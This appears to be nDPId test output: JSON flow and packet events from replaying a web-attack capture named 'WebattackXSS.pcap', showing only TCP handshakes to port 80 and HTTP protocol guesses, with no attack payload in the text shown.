-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1499347177248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347177248,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1JDtsXHRubHrpqAScSBGbgAAAgQFtAQCCAoD44YJATm0kwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1749,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1499347177249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347177249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XzdAAD4GZqGsEAABwKgKMtSQAFC5seum7bFx0oAQAOXldQAAAQEICgE5tJMD44YJ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1759,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347178540,"flow_last_seen":1499347178540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347178540,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1499347178540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347178540,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rRdAAD4GGLmsEAABwKgKMtSeAFA54BjBAAAAAKACchCAZAAAAgQFtAQCCAoBObXWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1499347178540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347178540,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1J7RuWV+OeAYwqAScSC+2wAAAgQFtAQCCAoD44dMATm11gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1499347178541,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347178541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rRhAAD4GGMCsEAABwKgKMtSeAFA54BjC0bllf4AQAOVd4wAAAQEICgE5tdYD44dM"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347181178,"flow_last_seen":1499347181178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181178,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1499347181178,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347181178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iI9AAD4GPUGsEAABwKgKMtS4AFBWujDmAAAAAKACchBIuAAAAgQFtAQCCAoBObhpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1499347181178,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347181178,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1LiEJRdhVrow56AScSAgTQAAAgQFtAQCCAoD44ngATm4aQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1499347181179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347181179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iJBAAD4GPUisEAABwKgKMtS4AFBWujDnhCUXYoAQAOW\/UwAAAQEICgE5uGoD44ng"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347182435,"flow_last_seen":1499347182435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347182435,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1499347182435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347182435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IhAAD4G6UesEAABwKgKMtTGAFDgpGUsAAAAAKACchCJPgAAAgQFtAQCCAoBObmkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1499347182435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347182435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1MbnFi1c4KRlLaAScSDmrAAAAgQFtAQCCAoD44saATm5pAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1499347182436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347182436,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03IlAAD4G6U6sEAABwKgKMtTGAFDgpGUt5xYtXYAQAOWFtAAAAQEICgE5uaQD44sa"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347183714,"flow_last_seen":1499347183714,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347183714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1499347183714,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347183714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/NBAAD4GyP+sEAABwKgKMtTUAFAdl0YzAAAAAKACchBp+AAAAgQFtAQCCAoBObrjAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1499347183715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347183715,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1NRZfFQSHZdGNKAScSAtCwAAAgQFtAQCCAoD44xaATm64wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1499347183715,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347183715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/NFAAD4GyQasEAABwKgKMtTUAFAdl0Y0WXxUE4AQAOXMEQAAAQEICgE5uuQD44xa"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1819,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347186286,"flow_last_seen":1499347186286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347186286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1499347186286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347186286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C2FAAD4Gum+sEAABwKgKMtTuAFDJ67YHAAAAAKACchBLMgAAAgQFtAQCCAoBOb1mAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1499347186286,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347186286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1O6dKYTkyeu2CKAScSCXQgAAAgQFtAQCCAoD447dATm9ZgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1499347186287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347186287,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C2JAAD4GunasEAABwKgKMtTuAFDJ67YInSmE5YAQAOU2SQAAAQEICgE5vWcD447d"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347187548,"flow_last_seen":1499347187548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347187548,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1499347187548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347187548,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aSdAAD4GXKmsEAABwKgKMtT8AFBu8NeFAAAAAKACchCDZQAAAgQFtAQCCAoBOb6iAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1499347187549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347187549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1PzTvrB4bvDXhqAScSBsEQAAAgQFtAQCCAoD45AYATm+ogEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":3,"flow_last_seen":1499347187549,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347187549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aShAAD4GXLCsEAABwKgKMtT8AFBu8NeG076weYAQAOULGQAAAQEICgE5vqID45AY"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347188799,"flow_last_seen":1499347188799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347188799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1499347188799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347188799,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dE1AAD4GUYOsEAABwKgKMtUKAFDFBMuWAAAAAKACchA3+QAAAgQFtAQCCAoBOb\/bAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1499347188799,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347188799,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Qqv+uT2xQTLl6AScSAOsgAAAgQFtAQCCAoD45FRATm\/2wEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1499347188800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347188800,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dE5AAD4GUYqsEAABwKgKMtUKAFDFBMuXr\/rk94AQAOWtuQAAAQEICgE5v9sD45FR"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347190051,"flow_last_seen":1499347190051,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347190051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1499347190051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347190051,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88xNAAD4G0rysEAABwKgKMtUYAFBhEDIAAAAAAKACchA0PgAAAgQFtAQCCAoBOcETAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1499347190051,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347190051,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1RhSQOITYRAyAaAScSBqWwAAAgQFtAQCCAoD45KKATnBEwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1499347190052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347190052,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08xRAAD4G0sOsEAABwKgKMtUYAFBhEDIBUkDiFIAQAOUJYgAAAQEICgE5wRQD45KK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347191299,"flow_last_seen":1499347191299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191299,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1499347191299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347191299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a9RAAD4GWfysEAABwKgKMtUmAFBoHamYAAAAAKACchC0UQAAAgQFtAQCCAoBOcJMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1499347191299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347191299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Sai+IEWaB2pmaAScSD5ewAAAgQFtAQCCAoD45PCATnCTAEDAwc="} 